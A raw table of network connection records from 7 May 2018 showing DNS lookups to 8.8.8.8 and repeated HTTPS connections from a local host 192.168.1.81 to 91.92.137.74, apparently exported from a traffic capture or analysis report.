Mai 7, 2018 14:49:59.656533003 MESZ53629938.8.8.8192.168.1.81
Mai 7, 2018 14:49:59.668673992 MESZ5878053192.168.1.818.8.8.8
Mai 7, 2018 14:49:59.710364103 MESZ53587808.8.8.8192.168.1.81
Mai 7, 2018 14:49:59.958909035 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:59.959080935 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.959119081 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:59.959759951 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.959785938 MESZ4434916591.92.137.74192.168.1.81
Mai 7, 2018 14:49:59.960217953 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.960324049 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:49:59.960412025 MESZ49165443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:00.029758930 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:00.029823065 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:00.029896021 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:00.031297922 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:00.031328917 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.060087919 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.060348988 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.085767984 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.085812092 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.091932058 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.091974020 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.725267887 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.725388050 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.725414991 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.725586891 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.725610018 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.726214886 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.726706982 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:01.726780891 MESZ4434916791.92.137.74192.168.1.81
Mai 7, 2018 14:50:01.726878881 MESZ49167443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.129126072 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.129182100 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:18.129264116 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.130630016 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.130669117 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:18.660918951 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:18.662002087 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.699434042 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.699459076 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:18.826329947 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:18.826387882 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:19.132747889 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:19.132867098 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:19.132888079 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:19.132999897 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:19.133410931 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:19.134037018 MESZ4434916891.92.137.74192.168.1.81
Mai 7, 2018 14:50:19.136897087 MESZ49168443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.125428915 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.125485897 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.125617981 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.127439022 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.127468109 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.630429029 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.630625963 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.681183100 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.681217909 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.687788010 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.687833071 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.956351995 MESZ5493453192.168.1.818.8.8.8
Mai 7, 2018 14:50:20.987132072 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.987380981 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:20.987426043 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:20.992855072 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.010361910 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.010529995 MESZ4434916991.92.137.74192.168.1.81
Mai 7, 2018 14:50:21.011044025 MESZ49169443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.265947104 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.265994072 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:21.266061068 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.267222881 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:21.267246962 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:21.522135973 MESZ53549348.8.8.8192.168.1.81
Mai 7, 2018 14:50:21.526216030 MESZ6284553192.168.1.818.8.8.8
Mai 7, 2018 14:50:21.625046015 MESZ53628458.8.8.8192.168.1.81
Mai 7, 2018 14:50:21.959645987 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:21.959753036 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.248624086 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.248667002 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.254482985 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.254513025 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.511234999 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.511528969 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.511599064 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.511677027 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.511989117 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.512729883 MESZ4434917091.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.512835026 MESZ49170443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.631843090 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.631901026 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:22.632128954 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.637629986 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:22.637665987 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:23.138309956 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:23.138420105 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:23.787291050 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:23.787319899 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:24.865243912 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:24.865273952 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.183897018 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.184053898 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.184122086 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.184227943 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.184540987 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.185210943 MESZ4434917291.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.185322046 MESZ49172443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.303251028 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.303307056 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.303683043 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.304938078 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.304969072 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.906641006 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.906786919 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.916754007 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.916796923 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:25.922651052 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:25.922679901 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.280219078 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.280395031 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.280424118 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.283083916 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.283109903 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.284081936 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.309689045 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.309916973 MESZ4434917391.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.310038090 MESZ49173443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.429156065 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.429222107 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.429315090 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.430871010 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.430896044 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.932140112 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.933259964 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.971972942 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.972002983 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:26.982112885 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:26.982146978 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:27.343884945 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:27.345050097 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.345077991 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:27.346410036 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.346676111 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.346770048 MESZ4434917491.92.137.74192.168.1.81
Mai 7, 2018 14:50:27.352819920 MESZ49174443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.574843884 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.574908972 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:27.575330019 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.576484919 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:27.576508999 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.308366060 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.308540106 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.629034996 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.629090071 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.638390064 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.638418913 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.874737978 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.875103951 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.875150919 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.875869989 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.876287937 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.876385927 MESZ4434917591.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.876482964 MESZ49175443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.993490934 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.993551970 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:28.993643999 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.995147943 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:28.995174885 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:29.783293962 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:29.783453941 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.258991957 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.259026051 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.267086029 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.267118931 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.494457006 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.494595051 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.494617939 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.496949911 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.496969938 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.497054100 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.497248888 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.497328043 MESZ4434917691.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.497330904 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.497392893 MESZ49176443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.613559961 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.613604069 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:30.613836050 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.615142107 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:30.615169048 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:31.155294895 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:31.155441046 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.049947977 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.049983978 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.056523085 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.056551933 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.423326015 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.423460007 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.423501968 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.423994064 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.424221992 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.424592018 MESZ4434917791.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.427001953 MESZ49177443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.551448107 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.551506042 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:32.551575899 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.552609921 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:32.552643061 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.204575062 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.205807924 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.247412920 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.247442007 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.253530025 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.253554106 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.667110920 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.667279959 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.667299986 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.671252966 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.942887068 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:33.943125963 MESZ4434917891.92.137.74192.168.1.81
Mai 7, 2018 14:50:33.943236113 MESZ49178443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.109277964 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.109327078 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:34.109388113 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.110445023 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.110465050 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:34.728581905 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:34.728786945 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.739916086 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.739959955 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:34.979110003 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:34.979147911 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.242108107 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.242212057 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.242244005 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.242779016 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.242798090 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.243048906 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.249870062 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.250014067 MESZ4434917991.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.250087976 MESZ49179443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.416445017 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.416495085 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:35.416601896 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.417680979 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:35.417711973 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.371347904 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.371449947 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.507368088 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.507404089 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.513804913 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.513834000 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.751724005 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.751858950 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.751882076 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.752301931 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.752329111 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.752739906 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.752878904 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.753246069 MESZ4434918091.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.753365993 MESZ49180443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.881068945 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.881135941 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:36.881257057 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.882481098 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:36.882513046 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:37.597094059 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:37.597424984 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:37.619831085 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:37.619896889 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:37.628448009 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:37.628484011 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.197602034 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.197900057 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.197922945 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.200196981 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.200443983 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.200539112 MESZ4434918191.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.200614929 MESZ49181443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.321367025 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.321429968 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.321506977 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.322752953 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.322787046 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.880775928 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.880918026 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.935354948 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.935383081 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:38.943293095 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:38.943315029 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:39.156116962 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:39.156312943 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.156339884 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:39.159090996 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.159399033 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.159475088 MESZ4434918291.92.137.74192.168.1.81
Mai 7, 2018 14:50:39.163074970 MESZ49182443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.405277967 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.405330896 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:39.405494928 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.406667948 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:39.406692982 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.033966064 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.034140110 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.499103069 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.499140024 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.507280111 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.507307053 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.767522097 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.768290997 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.768315077 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.769120932 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.769397020 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.769479990 MESZ4434918391.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.769581079 MESZ49183443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.894728899 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.894793987 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:40.894901991 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.896469116 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:40.896495104 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.553051949 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.553155899 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:41.570770979 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:41.570797920 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.577754021 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:41.577780962 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.882117987 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.882273912 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:41.882298946 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:41.882741928 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.071378946 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.071628094 MESZ4434918491.92.137.74192.168.1.81
Mai 7, 2018 14:50:42.071703911 MESZ49184443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.193461895 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.193521023 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:42.193605900 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.194806099 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.194833040 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:42.883234024 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:42.883326054 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.893348932 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.893408060 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:42.899681091 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:42.899741888 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.117010117 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.117193937 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.117219925 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.117301941 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.117316008 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.117381096 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.117687941 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.118493080 MESZ4434918591.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.118572950 MESZ49185443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.295922995 MESZ49186443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.295981884 MESZ4434918691.92.137.74192.168.1.81
Mai 7, 2018 14:50:43.296047926 MESZ49186443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.297276020 MESZ49186443192.168.1.8191.92.137.74
Mai 7, 2018 14:50:43.297308922 MESZ4434918691.92.137.74192.168.1.81
